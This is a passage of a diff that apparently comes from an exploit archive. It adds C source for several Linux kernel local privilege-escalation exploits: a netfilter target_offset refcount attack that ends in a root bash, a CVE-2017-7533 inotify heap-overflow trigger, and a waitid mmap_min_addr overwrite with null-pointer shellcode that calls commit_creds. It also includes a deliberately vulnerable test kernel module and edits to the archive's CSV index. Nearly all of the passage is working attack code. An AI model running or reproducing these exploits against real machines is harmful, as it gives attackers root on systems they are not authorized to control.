+		
+		if (strstr(fbuf, "smap") || strstr(fbuf, "smep")) {
+			fclose(proc_cpuinfo);
+			return -1;
+		}
+	}
+
+	fclose(proc_cpuinfo);
+	return 0;
+}
+
+int check_mod() {
+	FILE *proc_modules;
+	char fbuf[256];
+
+	proc_modules = fopen("/proc/modules", "r");
+
+	if (proc_modules < 0) {
+		perror("fopen");
+		return -1;
+	}
+
+	memset(fbuf, 0, sizeof(fbuf));
+	
+	while(fgets(fbuf, 256, proc_modules) != NULL) {
+		if (strlen(fbuf) == 0)
+			continue;
+		
+		if (!strncmp("ip_tables", fbuf, 9)) {
+			fclose(proc_modules);
+			return 0;
+		}
+	}
+
+	fclose(proc_modules);
+	return -1;
+}
+
+int decr(void *p) {
+	int sock, optlen;
+	int ret;
+	void *data;
+	struct ipt_replace *repl;
+	struct ipt_entry *entry;
+	struct xt_entry_match *ematch;
+	struct xt_standard_target *target;
+	unsigned i;
+
+	sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
+
+	if (sock == -1) {
+	        perror("socket");
+	        return -1;
+	}
+
+	data = malloc(MALLOC_SIZE);
+
+	if (data == NULL) {
+		perror("malloc");
+		return -1;
+	}
+
+	memset(data, 0, MALLOC_SIZE);
+
+	repl = (struct ipt_replace *) data;
+	repl->num_entries = 1;
+	repl->num_counters = 1;
+	repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;
+	repl->valid_hooks = 0;
+
+	entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));
+	entry->target_offset = 74; // overwrite target_offset
+	entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);
+
+	ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));
+
+	strcpy(ematch->u.user.name, "icmp");
+	void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);
+	uint64_t *me = (uint64_t *)(kmatch + 0x58);
+	*me = 0xffffffff821de10d; // magic number!
+
+	uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
+	*match = (uint32_t)kmatch;
+	
+	ematch->u.match_size = (short)0xffff;
+
+	target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);
+	uint32_t *t = (uint32_t *)target;
+	*t = (uint32_t)kmatch;
+
+	printf("[!] Decrementing the refcount. This may take a while...\n");
+	printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n");
+
+	for (i = 0; i < 0xffffff/2+1; i++) {
+		ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);
+	}
+
+	close(sock);
+	free(data);
+	printf("[+] Done! Now run ./pwn\n");
+
+	return 0;
+}
+
+int main(void) {
+	void *stack;
+	int ret;
+
+	printf("netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\n");
+	if (check_mod()) {
+		printf("[-] No ip_tables module found! Quitting...\n");
+		return -1;
+	}
+
+	if (check_smaep()) {
+		printf("[-] SMEP/SMAP support dectected! Quitting...\n");
+		return -1;
+	}
+
+	ret = unshare(CLONE_NEWUSER);
+
+	if (ret == -1) {
+		perror("unshare");
+		return -1;
+	}
+
+	stack = (void *) malloc(65536);
+
+	if (stack == NULL) {
+		perror("malloc");
+		return -1;
+	}
+
+	clone(decr, stack + 65536, CLONE_NEWNET, NULL);
+
+	sleep(1);
+
+	return 0;
+}
+
+/** decr.c EOF **/
+
+/** pwn.c **/
+/**
+ * Run ./decr first!
+ *
+ * 23/04/2016
+ * - vnik
+ */
+#include <stdio.h>
+#include <string.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdint.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <assert.h>
+
+#define MMAP_ADDR 0xff814e3000
+#define MMAP_OFFSET 0xb0
+
+typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);
+typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);
+
+void __attribute__((regparm(3))) privesc() {
+	commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;
+	prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;
+        commit_creds(prepare_kernel_cred((uint64_t)NULL));
+}
+
+int main() {
+	void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);
+	assert(payload == (void *)MMAP_ADDR);
+
+	void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);
+
+	memset(shellcode, 0, 0x300000);
+
+	void *ret = memcpy(shellcode, &privesc, 0x300);
+	assert(ret == shellcode);
+
+	printf("[+] Escalating privs...\n");
+
+	int fd = open("/dev/ptmx", O_RDWR);
+	close(fd);
+
+	assert(!getuid());
+
+	printf("[+] We've got root!");
+
+        return execl("/bin/bash", "-sh", NULL);
+}
+/** pwn.c EOF **/

exploits/linux/local/44302.c

@@ -0,0 +1,349 @@
+/*
+ * 
+ *
+ * CVE-2017-7533 inotfiy linux kernel vulnerability.
+ *
+ * $ gcc -o exploit exploit.c -lpthread
+ * $./exploit
+ *
+ * ```
+ * Listening for events.
+ * Listening for events.
+ * alloc_len : 50
+ * longname="test_dir/bbbb32103210321032100<30><30>1<EFBFBD><31><EFBFBD><EFBFBD>"
+ * handle_events() event->name : b, event->len : 16
+ * Detected overwrite!!!
+ * callrename done.
+ * alloc_len : 50
+ * ```
+ * This is a heap overflow bug, 
+ * tested on the Debian 8 Linux version 3.16.39(amd64) successfully.
+ *
+ * You could modifiy one byte to manipulate rip register, but I do not tried hard to get root.
+ *
+ * Thanks to the Vladis Dronov <vdronov () redhat com> and someone from HK university.
+ * ```
+ * ```
+ * Jeremy Huang (jeremyhcw@gmail.com)
+*/
+
+//Trigger inotify event by file open and rename to trigger the vulnerability and exploit
+
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <pthread.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <netinet/tcp.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <string.h>
+#include <signal.h>
+#include <sys/eventfd.h>
+#include <sys/inotify.h>
+#include <sys/mman.h>
+#include <ctype.h>
+#include <errno.h>
+#include <err.h>
+#include <poll.h>
+#include <unistd.h>
+
+void *callrename( void *ptr );
+void *openclose( void *ptr );
+pthread_t thread1, thread2;
+int lastfd;
+char *space;
+int original,printed, *int_space;
+
+volatile int stop = 0;
+
+// Try kmalloc-192 made by cyclic(100)
+char *orig_name = "f";
+
+// 120
+//char *orig_name = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
+
+static void handle_events(int fd, int *wd, int argc, char* argv[])
+{
+   /* Some systems cannot read integer variables if they are not
+      properly aligned. On other systems, incorrect alignment may
+      decrease performance. Hence, the buffer used for reading from
+      the inotify file descriptor should have the same alignment as
+      struct inotify_event. */
+
+   char buf[4096]
+       __attribute__ ((aligned(__alignof__(struct inotify_event))));
+   const struct inotify_event *event;
+   int i;
+   ssize_t len;
+   char *ptr;
+
+   /* Loop while events can be read from inotify file descriptor. */
+
+   for (;;) {
+
+       /* Read some events. */
+
+       len = read(fd, buf, sizeof buf);
+       if (len == -1 && errno != EAGAIN) {
+           perror("read");
+           exit(EXIT_FAILURE);
+       }
+
+       /* If the nonblocking read() found no events to read, then
+          it returns -1 with errno set to EAGAIN. In that case,
+          we exit the loop. */
+
+       if (len <= 0)
+           break;
+
+       /* Loop over all events in the buffer */
+
+       for (ptr = buf; ptr < buf + len;
+               ptr += sizeof(struct inotify_event) + event->len) {
+
+           event = (const struct inotify_event *) ptr;
+
+           /* Print event type */
+/*
+           if (event->mask & IN_OPEN)
+               printf("IN_OPEN: ");
+           if (event->mask & IN_CLOSE_NOWRITE)
+               printf("IN_CLOSE_NOWRITE: ");
+           if (event->mask & IN_CLOSE_WRITE)
+               printf("IN_CLOSE_WRITE: ");
+           if (event->mask % IN_ACCESS)
+               printf("IN_ACCESS: ");
+*/
+           /* Print the name of the watched directory */
+
+           for (i = 1; i < argc; ++i) {
+               if (wd[i] == event->wd) {
+                   //printf("%s/", argv[i]);
+                   break;
+               }
+           }
+
+           /* Print the name of the file */
+
+           if (event->len && strcmp(event->name, orig_name)) {
+               printf("%s() event->name : %s, event->len : %d\n",__func__, event->name, event->len);
+
+                if ( !strcmp(event->name, "b") && strlen(event->name) == 1) {
+                    printf("Detected overwrite!!!\n");
+                    stop = 1;
+                    break;
+                }
+           }
+
+           /* Print type of filesystem object */
+/*
+           if (event->mask & IN_ISDIR)
+               printf(" [directory]\n");
+           else
+               printf(" [file]\n");
+*/
+       }
+   }
+}
+
+static void* notify_thread_func(void* arg) 
+{
+   char buf;
+   int fd, i, poll_num;
+   int *wd;
+   nfds_t nfds;
+   struct pollfd fds[2];
+
+   int argc = 2;
+   char *argv[] = { NULL, "test_dir", NULL};
+/*
+   if (argc < 2) {
+       printf("Usage: %s PATH [PATH ...]\n", argv[0]);
+       exit(EXIT_FAILURE);
+   }
+*/
+   //printf("Press ENTER key to terminate.\n");
+
+   /* Create the file descriptor for accessing the inotify API */
+
+   fd = inotify_init1(IN_NONBLOCK);
+   if (fd == -1) {
+       perror("inotify_init1");
+       exit(EXIT_FAILURE);
+   }
+
+   /* Allocate memory for watch descriptors */
+
+   wd = calloc(argc, sizeof(int));
+   if (wd == NULL) {
+       perror("calloc");
+       exit(EXIT_FAILURE);
+   }
+
+   /* Mark directories for events
+      - file was opened
+      - file was closed */
+
+   for (i = 1; i < argc; i++) {
+       wd[i] = inotify_add_watch(fd, argv[i],
+                                 IN_OPEN | IN_CLOSE| IN_ACCESS);
+       if (wd[i] == -1) {
+           fprintf(stderr, "Cannot watch '%s'\n", argv[i]);
+           perror("inotify_add_watch");
+           exit(EXIT_FAILURE);
+       }
+   }
+
+   /* Prepare for polling */
+
+   nfds = 2;
+
+   /* Console input */
+
+   fds[0].fd = STDIN_FILENO;
+   fds[0].events = POLLIN;
+
+   /* Inotify input */
+
+   fds[1].fd = fd;
+   fds[1].events = POLLIN;
+
+   printf("Listening for events.\n");
+   while (!stop) {
+       poll_num = poll(fds, nfds, -1);
+       if (poll_num == -1) {
+           if (errno == EINTR)
+               continue;
+           perror("poll");
+           exit(EXIT_FAILURE);
+       }
+
+       if (poll_num > 0) {
+
+           if (fds[1].revents & POLLIN) {
+
+               handle_events(fd, wd, argc, argv);
+           }
+       }
+   }
+
+   close(fd);
+
+   free(wd);
+   exit(EXIT_SUCCESS);
+}
+
+void *trigger_rename_open(void* arg)
+{
+     int  iret1, iret2,i;
+
+     setvbuf(stdout,0,2,0);
+
+     iret1 = pthread_create( &thread1, NULL, callrename, NULL);
+     if(iret1)
+     {
+         fprintf(stderr,"Error - pthread_create() return code: %d\n",iret1);
+         exit(EXIT_FAILURE);
+     }
+     
+     iret2 = pthread_create( &thread2, NULL, openclose, NULL);
+     if(iret2)
+     {
+         fprintf(stderr,"Error - pthread_create() return code: %d\n",iret2);
+         exit(EXIT_FAILURE);
+     }
+     pthread_join( thread1, NULL);
+     pthread_join( thread2, NULL);
+     exit(EXIT_SUCCESS);
+}
+
+
+// 250
+char *longname_padding =   "bbbb3210321032103210";
+//char *longname_padding =   "bbbb32103210321032103210ABCDEF";
+/*
+rcx : 44434241..
+      DCDA0123
+*/
+//  char *longname_padding =   "bbbb3210321032GFEDCBA";
+// 31 will crash
+void *callrename( void *ptr )
+{
+    int i,m,k;
+    char enter = 0;
+    char origname[1024];
+    char longname[1024];
+    char next_ptr[8] = "\x30\xff\xff\x31\xff\xff\xff\xff"; 
+    char prev_ptr[8] = ""; 
+    // This value will overwrite the next (struct fsnotify_event)event->list.next 
+
+
+    // create shortname being initial name.
+    snprintf(origname, sizeof origname, "test_dir/%s", orig_name);
+    printf("alloc_len : %d\n", 48 + strlen(orig_name)+1);
+    //printf("origname=\"%s\"\n", origname);
+    
+    snprintf(longname, sizeof longname, "test_dir/%s%s%s", 
+             longname_padding, next_ptr, prev_ptr);
+    //strcat(longname,space);
+    printf("longname=\"%s\"\n", longname);
+
+    for (i=0;i<10000 && !stop ;i++)
+    {
+        if (rename(origname,longname)<0) perror("rename1");
+        if (rename(longname,origname)<0) perror("rename2");
+        
+    }
+
+    printf("callrename done.\n");
+}
+
+void *openclose( void *ptr )
+{
+    int j,fd,m,k;
+    char origname[1024];
+    snprintf(origname, sizeof origname, "test_dir/%s", orig_name);
+
+    for (j=0;j<8000 && !stop;j++ )
+    {
+        open(origname,O_RDWR);
+
+    }
+    printf("alloc_len : %d\n", 48 + strlen(orig_name)+1);
+
+}
+
+
+void main(void) 
+{
+    pthread_t notify_thread[4];
+    pthread_t rename_thread;
+    int i = 0;
+    
+    char buf[1024];
+    snprintf(buf, sizeof buf, "touch test_dir/%s", orig_name);
+    system("rm -rf /data/local/tmp/test_dir ; mkdir test_dir");
+    system(buf);
+
+    for ( i ; i < 2; i++ ) {
+        pthread_create(&notify_thread[i], 
+                       NULL, 
+                       notify_thread_func, 
+                       NULL);
+    }
+    //Trigger inotify event by file open and rename to 
+    //trigger the vulnerability 
+    pthread_create(&rename_thread, NULL, trigger_rename_open, NULL);
+
+    pthread_join(rename_thread, NULL);
+    for ( i = 0; i < 2; i++ )
+        pthread_join(notify_thread[i], NULL);
+
+}

exploits/linux/local/44303.c

@@ -0,0 +1,307 @@
+/** disable_map_min_add.c **/
+/*
+ *
+ */
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <sys/resource.h>
+#include <syscall.h>
+
+/* offsets might differ, kernel was custom compiled
+ * you can read vmlinux and caculate the offset when testing
+ */
+
+/*
+#define OFFSET_KERNEL_BASE 0x000000
+ */
+#define MMAP_MIN_ADDR 0x1101de8
+#define DAC_MMAP_MIN_ADDR 0xe8e810
+
+/* get kernel functions address by reading /proc/kallsyms */
+unsigned long get_kernel_sym(char *name)
+{
+  FILE *f;
+  unsigned long addr;
+  char dummy;
+  char sname[256];
+  int ret = 0;
+
+  f = fopen("/proc/kallsyms", "r");
+  if (f == NULL) {
+    printf("[-] Failed to open /proc/kallsyms\n");
+    exit(-1);
+  }
+  printf("[+] Find %s...\n", name);
+  while(ret != EOF) {
+    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+    if (ret == 0) {
+      fscanf(f, "%s\n", sname);
+      continue;
+    }
+    if (!strcmp(name, sname)) {
+      fclose(f);
+      printf("[+] Found %s at %lx\n", name, addr);
+      return addr;
+    }
+  }
+  fclose(f);
+  return 0;
+}
+
+int main(void)
+{
+  int pid, pid2, pid3;
+  struct rusage rusage = { };
+  unsigned long *p, *kernel_base;
+  char *mmap_min_addr, *dac_mmap_min_addr;
+  pid = fork();
+  if (pid > 0) {
+    /* try to bypass kaslr when /proc/kallsyms isn't readable */
+    syscall(__NR_waitid, P_PID, pid, NULL, WEXITED|WNOHANG|__WNOTHREAD, &rusage);
+    printf("[+] Leak size=%d bytes\n", sizeof(rusage));
+    for (p = (unsigned long *)&rusage;
+	 p < (unsigned long *)((char *)&rusage + sizeof(rusage));
+	 p++) {
+      printf("[+] Leak point: %p\n", p);
+      if (*p > 0xffffffff00000000 && *p < 0xffffffffff000000) {
+	p = (unsigned long *)(*p&0xffffffffff000000 /*+ OFFSET_TO_BASE*/); // spender's wouldn't actually work when KASLR was enabled
+	break;
+      }
+    }
+    if(p < (unsigned long *)0xffffffff00000000 || p > (unsigned long *)0xffffffffff000000)
+      exit(-1);
+  } else if (pid == 0) {
+    sleep(1);
+    exit(0);
+  }
+
+  kernel_base = get_kernel_sym("startup_64");
+  printf("[+] Got kernel base: %p\n", kernel_base);
+  mmap_min_addr = (char *)kernel_base + MMAP_MIN_ADDR;
+  printf("[+] Got mmap_min_addr: %p\n", mmap_min_addr);
+  dac_mmap_min_addr = (char *)kernel_base + DAC_MMAP_MIN_ADDR;
+  printf("[+] Got dac_mmap_min_addr: %p\n", dac_mmap_min_addr);
+  
+  pid2 = fork();
+  if (pid2 > 0) {
+    printf("[+] Overwriting map_min_addr...\n");
+    if (syscall(__NR_waitid, P_PID, pid, (siginfo_t *)(mmap_min_addr - 2), WEXITED|WNOHANG|__WNOTHREAD, NULL) < 0) {
+      printf("[-] Failed!\n");
+      exit(1);
+    }
+  } else if (pid2 == 0) {
+    sleep(1);
+    exit(0);
+  }
+  
+  pid3 = fork();
+  if (pid3 > 0) {
+    printf("[+] Overwriting dac_mmap_min_addr...\n");
+    if (syscall(__NR_waitid, P_PID, pid, (siginfo_t *)(dac_mmap_min_addr - 2), WEXITED|WNOHANG|__WNOTHREAD, NULL) < 0) {
+      printf("[-] Failed!\n");
+      exit(1);
+    }
+    printf("[+] map_min_addr disabled!\n");
+    exit(0);
+  } else if (pid3 == 0) {
+    sleep(1);
+    exit(0);
+  }
+  return 0;
+}
+/** disable_map_min_add.c EOF **/
+
+/** null_poiter_exploit.c **/
+
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <unistd.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+struct cred;
+struct task_struct;
+
+typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));
+typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));
+
+prepare_kernel_cred_t   prepare_kernel_cred;
+commit_creds_t    commit_creds;
+
+/* a kernel null pointer derefence will help get privilege
+ * /proc/test is a kernel-load module create for testing
+ * touch_null_kp can be replace your own implement to
+ * touch a kernel null ponit
+ */
+void touch_null_kp()  {
+    printf("[+]Start touch kernel null point\n");
+
+    int *f = open("/proc/test", O_RDONLY);
+    read(f, NULL, 0);
+}
+
+/* run shell after root */
+void get_shell() {
+  char *argv[] = {"/bin/sh", NULL};
+
+  if (getuid() == 0){
+    printf("[+] Root shell success !! :)\n");
+    execve("/bin/sh", argv, NULL);
+  }
+  printf("[-] failed to get root shell :(\n");
+}
+
+/* use for privilige escalation */
+void get_root() {
+    commit_creds(prepare_kernel_cred(0));
+}
+
+/* get function address by reading /proc/kallsyms */
+unsigned long get_kernel_sym(char *name)
+{
+  FILE *f;
+  unsigned long addr;
+  char dummy;
+  char sname[256];
+  int ret = 0;
+
+  f = fopen("/proc/kallsyms", "r");
+  if (f == NULL) {
+    printf("[-] Failed to open /proc/kallsyms\n");
+    exit(-1);
+  }
+  printf("[+] Find %s...\n", name);
+  while(ret != EOF) {
+    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+    if (ret == 0) {
+      fscanf(f, "%s\n", sname);
+      continue;
+    }
+    if (!strcmp(name, sname)) {
+      fclose(f);
+      printf("[+] Found %s at %lx\n", name, addr);
+      return addr;
+    }
+  }
+  fclose(f);
+  return 0;
+}
+
+int main(int ac, char **av)
+{
+
+  /* get function address */
+  prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred");
+  commit_creds = (commit_creds_t)get_kernel_sym("commit_creds");
+  printf("Got commit_creds:%p,prepare_kernel_cred%p\n", commit_creds, prepare_kernel_cred);
+
+  /* allocate memory loacate in 0x00 */
+  printf("[+] Try to allocat 0x00000000...\n");
+  if (mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){
+    printf("[-] Failed to allocat 0x00000000\n");
+    return -1;
+  }
+  printf("[+] Allocation success !\n");
+  /* memset(0, 0xcc, 4096); */
+  /*
+    //movq rax, 0xffffffff81f3f45a
+    //movq [rax], 0
+    // it is not nessecc
+    mov rax, 0x4242424242424242
+    call rax
+    xor rax, rax
+    ret
+    replace 0x4242424242424242 by get_root
+    https://defuse.ca/online-x86-assembler.htm#disassembly
+     */
+
+  unsigned char shellcode[] = 
+    { /*0x48, 0xC7, 0xC0, 0x5A, 0xF4, 0xF3, 0x81, *//*0x48, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00,*/ 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 };
+  /* insert the getroot address to shellcode */
+  void **get_root_offset = rawmemchr(shellcode, 0x42);
+  (*get_root_offset) = get_root;
+  /* map shellcode to 0x00 */
+  memcpy(0, shellcode, sizeof(shellcode));
+
+  /* jmp to 0x00 */
+  touch_null_kp();
+
+  get_shell();
+
+}
+
+/** null_poiter_exploit.c EOF **/
+
+/** test.c **/
+#include <linux/init.h>
+#include <linux/module.h>
+#include <linux/proc_fs.h>
+#include <linux/uaccess.h>
+#include <linux/slab.h>
+#include <asm/ptrace.h>
+#include <asm/thread_info.h>
+
+#define MY_DEV_NAME "test"
+#define DEBUG_FLAG "PROC_DEV"
+
+extern unsigned long proc_test_sp_print;
+static ssize_t proc_read (struct file *proc_file, char __user *proc_user, size_t n, loff_t *loff);
+static ssize_t proc_write (struct file *proc_file, const char __user *proc_user, size_t n, loff_t *loff);
+static int proc_open (struct inode *proc_inode, struct file *proc_file);
+static struct file_operations a = {
+                                .open = proc_open,
+                                .read = proc_read,
+                                .write = proc_write,
+};
+
+
+static int __init mod_init(void)
+{
+    struct proc_dir_entry *test_entry;
+    const struct file_operations *proc_fops = &a;
+    printk(DEBUG_FLAG":proc init start\n");
+
+    test_entry = proc_create(MY_DEV_NAME, S_IRUGO|S_IWUGO, NULL, proc_fops);
+    if(!test_entry)
+       printk(DEBUG_FLAG":there is somethings wrong!\n");
+
+    printk(DEBUG_FLAG":proc init over!\n");
+    return 0;
+}
+
+static ssize_t proc_read (struct file *proc_file, char *proc_user, size_t n, loff_t *loff)
+{
+    void (*fun)(void);
+    fun = NULL;
+    //printk("%s:thread.sp0: %p, task->stack: %p\n", "PROC", current->thread.sp0, current->stack);
+    fun();
+    //printk("The memory of %p : %d\n", proc_user, *proc_user);
+    return 0;
+}
+
+static ssize_t proc_write (struct file *proc_file, const char __user *proc_user, size_t n, loff_t *loff)
+{
+    printk("%s:thread.sp0: %p, task->stack: %p\n", "PROC", current->thread.sp0, current->stack);
+    return 0;
+}
+
+int proc_open (struct inode *proc_inode, struct file *proc_file)
+{
+    printk(DEBUG_FLAG":into open, cmdline:%s!\n", current->comm);
+    printk("%s:thread.sp0: %p, task->stack: %p\n", "PROC", current->thread.sp0, current->stack);
+    return 0;
+}
+
+module_init(mod_init);
+/** test.c EOF **/

files_exploits.csv

@@ -1926,7 +1926,7 @@ id,file,description,date,author,type,platform,port
 16952,exploits/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2)",2011-03-10,zx2c4,dos,linux,
 16960,exploits/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow",2011-03-11,mr_me,dos,linux,
 16966,exploits/linux/dos/16966.php,"PHP 5.3.6 - 'shmop_read()' Integer Overflow Denial of Service",2011-03-12,"Jose Carlos Norte",dos,linux,
-16973,exploits/linux/dos/16973.c,"Linux 2.6.37-rc1 - serial_core TIOCGICOUNT Leak",2011-03-14,prdelka,dos,linux,
+16973,exploits/linux/dos/16973.c,"Linux Kenel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak",2011-03-14,prdelka,dos,linux,
 16979,exploits/windows/dos/16979.html,"Opera 11.01 - NULL PTR Dereference",2011-03-15,echo,dos,windows,
 16986,exploits/windows/dos/16986.py,"AVIPreview 0.26 Alpha - Denial of Service",2011-03-16,BraniX,dos,windows,
 16996,exploits/windows/dos/16996.rb,"Fake Webcam 6.1 - Local Crash (PoC)",2011-03-17,"Anastasios Monachos",dos,windows,
@@ -2123,7 +2123,7 @@ id,file,description,date,author,type,platform,port
 18339,exploits/windows/dos/18339.py,"GPSMapEdit 1.1.73.2 - '.lst' Local Denial of Service",2012-01-09,"Julien Ahrens",dos,windows,
 18351,exploits/netware/dos/18351.txt,"Novell Netware - XNFS caller_name xdrDecodeString Remote Code Execution",2012-01-10,"Francis Provencher",dos,netware,
 18370,exploits/multiple/dos/18370.txt,"PHP 5.3.8 - Multiple Vulnerabilities",2012-01-14,"Maksymilian Arciemowicz",dos,multiple,
-18378,exploits/linux/dos/18378.c,"Linux 2.6.36 IGMP - Remote Denial of Service",2012-01-17,kingcope,dos,linux,
+18378,exploits/linux/dos/18378.c,"Linux Kernel 2.6.36 IGMP - Remote Denial of Service",2012-01-17,kingcope,dos,linux,
 18976,exploits/php/dos/18976.php,"PHP 5.3.10 - 'spl_autoload()' Local Denial of Service",2012-06-03,"Yakir Wizman",dos,php,
 18399,exploits/windows/dos/18399.py,"VideoLAN VLC Media Player 1.2.0 - 'libtaglib_pluggin.dll' Denial of Service",2012-01-20,"Mitchell Adair",dos,windows,
 18698,exploits/windows/dos/18698.py,"Xion Audio Player 1.0.127 - '.aiff' Denial of Service",2012-04-04,condis,dos,windows,
@@ -2581,7 +2581,7 @@ id,file,description,date,author,type,platform,port
 21074,exploits/unix/dos/21074.pl,"glFTPd 1.x - 'LIST' Denial of Service",2001-08-17,"ASGUARD LABS",dos,unix,
 21077,exploits/bsd/dos/21077.c,"BSDI 3.0/3.1 - Local Kernel Denial of Service",2001-08-21,V9,dos,bsd,
 21092,exploits/hardware/dos/21092.txt,"Cisco CBOS 2.x - Multiple TCP Connection Denial of Service Vulnerabilities",2001-08-23,"Cisco Security",dos,hardware,
-40419,exploits/linux/dos/40419.c,"Linux - SELinux W+X Protection Bypass via AIO",2016-09-23,"Google Security Research",dos,linux,
+40419,exploits/linux/dos/40419.c,"Linux SELinux - W+X Protection Bypass via AIO",2016-09-23,"Google Security Research",dos,linux,
 21099,exploits/windows/dos/21099.c,"Microsoft Windows Server 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,dos,windows,
 21103,exploits/hardware/dos/21103.c,"D-Link Dl-704 2.56 b5 - IP Fragment Denial of Service",2000-05-23,phonix,dos,hardware,
 21122,exploits/linux/dos/21122.sh,"Linux Kernel 2.2/2.4 - Deep Symbolic Link Denial of Service",2001-10-18,Nergal,dos,linux,
@@ -4152,7 +4152,7 @@ id,file,description,date,author,type,platform,port
 32881,exploits/windows/dos/32881.py,"QtWeb Browser 2.0 - '.HTML' File Remote Denial of Service",2009-04-01,LiquidWorm,dos,windows,
 32899,exploits/windows/dos/32899.py,"Jzip - Buffer Overflow (Denial of Service) (SEH Unicode)",2014-04-16,"motaz reda",dos,windows,
 32902,exploits/windows/dos/32902.py,"Microsoft Internet Explorer 8 - File Download Denial of Service",2009-04-11,"Nam Nguyen",dos,windows,
-32926,exploits/linux/dos/32926.c,"Linux group_info refcounter - Overflow Memory Corruption",2014-04-18,"Thomas Pollet",dos,linux,
+32926,exploits/linux/dos/32926.c,"Linux Kernel - 'group_info' refcounter Overflow Memory Corruption",2014-04-18,"Thomas Pollet",dos,linux,
 32939,exploits/windows/dos/32939.txt,"Trend Micro OfficeScan 8.0 Client - Denial of Service",2009-04-21,"Juan Pablo Lopez Yacubian",dos,windows,
 32949,exploits/multiple/dos/32949.txt,"Mani's Admin Plugin - Remote Denial of Service",2009-04-22,M4rt1n,dos,multiple,
 32951,exploits/novell/dos/32951.py,"Recover Data for Novell Netware 1.0 - '.sav' Remote Denial of Service",2009-04-23,"AbdulAziz Hariri",dos,novell,
@@ -5040,7 +5040,7 @@ id,file,description,date,author,type,platform,port
 39502,exploits/linux/dos/39502.py,"GpicView 0.2.5 - Crash (PoC)",2016-02-26,"David Silveiro",dos,linux,
 39503,exploits/multiple/dos/39503.txt,"Wireshark - print_hex_data_buffer / print_packet Use-After-Free",2016-02-26,"Google Security Research",dos,multiple,
 39504,exploits/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver - perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",dos,android,
-39505,exploits/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",dos,linux,
+39505,exploits/linux/dos/39505.c,"Linux Kernel - io_submit L2TP sendmsg Integer Overflow",2016-02-26,"Google Security Research",dos,linux,
 39509,exploits/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - '.pm4' Integer Division By Zero",2016-03-01,LiquidWorm,dos,windows,
 39512,exploits/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)",2016-03-01,"Shantanu Khandelwal",dos,windows,
 39516,exploits/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",dos,windows,69
@@ -5103,7 +5103,7 @@ id,file,description,date,author,type,platform,port
 39654,exploits/windows/dos/39654.pl,"Xion Audio Player 1.5 (build 160) - '.mp3' Crash (PoC)",2016-04-04,"Charley Celice",dos,windows,
 39657,exploits/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,dos,multiple,
 39663,exploits/windows/dos/39663.html,"Microsoft Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",dos,windows,
-39669,exploits/linux_x86/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco & Ismael Ripoll",dos,linux_x86,
